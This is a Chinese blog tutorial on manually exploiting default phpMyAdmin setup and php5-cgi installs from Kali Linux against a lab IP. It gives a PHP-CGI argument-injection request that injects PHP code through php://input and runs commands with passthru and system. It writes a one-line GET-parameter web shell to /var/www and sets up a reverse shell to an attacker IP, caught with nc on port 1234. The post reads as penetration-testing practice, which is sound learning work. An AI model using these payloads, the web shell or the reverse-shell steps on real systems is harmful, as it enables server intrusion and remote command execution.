kali linux挖漏洞,kali linux之手动漏洞挖掘一

默认安装漏洞

phpmyadmin/setup默认安装

ubuntu/debian默认安装php5-cgi

phpmyadmin/setup默认安装

728b88739dec903a1180bd438926f1d4.png

使用?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1对php.ini文件做试探)

POSThttp://192.168.1.12/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1

Host: 192.168.1.12

Content-Length: 34

passthru('id'); ##使用passthru函数,执行命令,比如ls,cat等,如果可以执行,也可以写一句话木马进去

die(); ##die函数,不执行以下的操作

?>

点击那个笔,把设置好对应的端口

256b7764acc8c185606898dffb1bbacc.png

点击go,帐号就显示出来了(www权限)

e40ae94664a20ae95a751e1251a12ff9.png

pwd命令

2a9d412ae9ab76b88a20ce4d33272cd1.png

写入网页木马

echo "<?php \$cmd = \$_GET["cmd"];system(\$cmd);?>" >/var/www/xxsec.php

c19f5bc575a3fb05f2d41a469a159b72.png

3396cbd3c1e41da44d301648748fc9eb.png

写好木马后即可执行命令

954122671c6bdb844e2bfe48477d4ce3.png

反弹shell

e61838ec812ad6e5df7290685c6dc7a2.png

把php-reverse-shell.php拷贝到其他目录,然后编辑它,把ip地址变成攻击机

50fb1380361412bd4ad8566be977d900.png

编辑后保存,把内容发送到目标机器上(因为它是反弹链接,所以发送前,先用nc监听好端口)

fbc1233949d3c04f5d28e0441d65c0a5.png

我反弹shell上的反弹的1234端口,用nc监听1234端口,发送后就会反弹到nc会话

b07e2a6a405c0f5af05c8c8bd29a3694.png

ubuntu/debian默认安装php5-cgi,可以直接访问/cgi-bin/php5和cgi-bin/php(这个目录是爬不出来的)

-d allow_url_in clude=on -d safe_mode= off -d suhosin.simul ation=on -d disa

把这些代码复制到burp编码为url,否则执行不了,

a6f4a0d46029715704d33b99ca93d616.png

这里的host主机头必须有,使用system函数执行命令<?php echo system('id'); die(); ?>

aadd49cdc6c52c36a203ff029945963b.png

查看所有用户信息

154d4b42bfb35d5e94621c459e0db33d.png

也可以让主机监听一个端口,我们用nc连接这个端口,但是可能会被防火墙拦

友情链接 http://www.cnblogs.com/klionsec

http://www.cnblogs.com/l0cm

http://www.cnblogs.com/Anonyaptxxx

http://www.feiyusafe.cn

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值